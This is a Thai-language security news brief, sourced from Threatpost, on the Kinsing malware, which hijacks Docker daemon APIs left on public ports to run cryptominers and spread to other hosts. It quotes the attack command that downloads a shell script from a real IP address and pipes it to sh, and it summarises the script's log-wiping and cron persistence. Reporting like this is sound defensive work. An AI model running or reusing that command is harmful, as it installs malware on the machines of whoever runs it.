มัลแวร์สายขุดเหมืองบนDocker มีอัตราการแพร่กระจาย 1,000 พอร์ต/วัน

Docker กำลังประสบปัญหาจาก “Kinsing” มัลแวร์แบบแพร่กระจายตัวเอง

ขณะนี้ผู้ให้บริการคลาวด์คอนเทนเนอร์อย่าง Docker กำลังประสบปัญหาจาก
“Kinsing” มัลแวร์แบบแพร่กระจายตัวเองที่อาศัยช่องโหว่จากการตั้งค่า
Docker Daemon API ที่มีการเปิดพอร์ตสาธารณะไว้ โดยมีเป้าหมายในการโจมตีสูงถึง
1,000 คอนเทนเนอร์ต่อวัน

รูปแบบการโจมตีเริ่มจากการที่ผู้โจมตีค้นหา Docker API ที่มีการเปิดพอร์ตสาธารณะไว้
แล้วทำการเชื่อมต่อเข้ากับพอร์ตดังกล่าว ก่อนที่จะทำการรัน Rogue Ubuntu container เพื่อเรียกใช้ “Kinsing” ให้ไปดาวน์โหลดคริปโตไมเนอร์มารันบนเครื่องเป้าหมาย จากนั้นจะทำการแพร่กระจายตัวเองไปยังคอนเทนเนอร์และโฮสต์อื่นๆ
ต่อไป

คำสั่งที่มักจะพบในการโจมตีคือ “/bin/bash -c apt-get update && apt-get
install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh
| sh;tail -f /dev/null.” เพื่ออัพเดท Docker package ทำให้ผู้โจมตีจะสามารถดาวโหลดเชลล์สคริปต์ที่ชื่อ d.sh ได้

จากการวิเคราะห์เชลล์สคริปต์ดังกล่าวโดยคุณ Gal  Singer นักวิจัยด้านความปลอดภัยจาก AquaSec. พบว่ามันมีความสามารถหลายอย่าง เช่น ปิดการใช้งานระบบรักษาความปลอดภัย ลบLogs กำจัดมัลแวร์หรือคริปโตไมเนอร์ตัวอื่นๆ ดาวน์โหลดKinsing และใช้ “crontab” เพื่อรันสคริปต์ต้นฉบับในทุกๆ 1 นาที

ที่มา: https://threatpost.com/self-propagating-malware-docker-ports/154453/

 

Share